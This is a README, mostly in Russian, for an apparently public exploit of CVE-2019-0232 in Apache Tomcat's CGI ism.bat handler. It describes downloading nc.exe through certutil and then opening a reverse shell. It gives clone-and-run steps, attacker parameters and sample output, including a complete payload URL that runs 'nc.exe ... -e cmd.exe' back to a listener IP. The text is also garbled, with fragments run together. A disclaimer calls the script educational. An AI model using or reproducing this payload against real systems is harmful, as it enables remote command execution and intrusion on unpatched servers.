
Hi this is a revised and enhanced code for CVE-2019-0232
Этот скрипт эксплуатирует уязвимость CVE-2019-0232 в Apache Tomcat, которая позволяет удаленно выполнять код из-за неправильной обработки скрипта ism.bat. Скрипт использует технику реверс-шелла с помощью certutil и nc.exe (Netcat) для получения удаленного доступа к уязвимой системе.
ism.bat в Apache Tomcat, которая может позволить злоумышленникам выполнять произвольные команды на сервере. Уязвимость возникает из-за отсутствия надлежащей проверки ввода пользователя, что позволяет злоумышленникам инициировать выполнение произвольных команд с помощью специально сформированного запроса.nc.exe с удаленного сервера и его применения для создания реверс-шелла.nc.exe) для подключения реверс-шелла.nc.exe: Скрипт отправляет специально сформированный запрос на уязвимый сервер Tomcat для загрузки файла nc.exe (Netcat) на целевую машину с помощью certutil.nc.exe отправляется другой запрос для выполнения команды реверс-шелла, который подключается обратно к слушателю Netcat атакующего.git clone https://github.com/Dharan10/CVE-2019-0232.git
cd CVE-2019-0232
python3 exploit.py
Target Host: IP-адрес сервера Apache Tomcat для эксплуатации.
Target Port: Порт целевого сервера (по умолчанию: 8080).
Server IP: IP-адрес сервера, на котором размещен nc.exe.
Server Port: Номер порта, на котором размещен nc.exe (по умолчанию: 80).
Netcat Listener IP: Ваш IP-адрес, который будет принимать реверс-шелл.
Netcat Listener Port: Порт, на котором вы слушаете реверс-шелл.
[*] Sending payload to download nc.exe...
[+] URL1 Response: 200
[*] Sending payload to execute reverse shell...
[+] URL2 Response: 200
[*] Reverse shell payload URL: http://192.168.1.10:8080/cgi/ism.bat?&nc.exe+192.168.1.100+1234+-e+cmd.exe
После успешного выполнения вы должны получить соединение реверс-шелла обратно к вашему слушателю Netcat.
Этот скрипт предназначен только для образовательных целей. Не используйте его для вредоносных действий. Всегда получайте надлежащее разрешение перед попытками проведения пентеста или аудита безопасности. Неправильное использование этого скрипта может привести к юридическим последствиям.
Сделано с мощью!
Этот проект лицензирован в соответствии с MIT License.
Однако используйте его на свой страх и риск. Этот код предоставлен только для образовательных целей. Используя этот код, вы соглашаетесь взять на себя полную ответственность за любые действия, вытекающие из его использования. Неправильное или несанкционированное использование этого эксплойта может привести к юридическим последствиям. Всегда получайте надлежащее разрешение перед проведением любого тестирования безопасности или пентеста на любой системе.
Вы можете свободно использовать, изменять и распространять этот код, но только в этических целях. Автор не несет ответственности за любой ущерб, причиненный этим кодом.
Не используйте этот эксплойт без явного разрешения владельца целевой системы.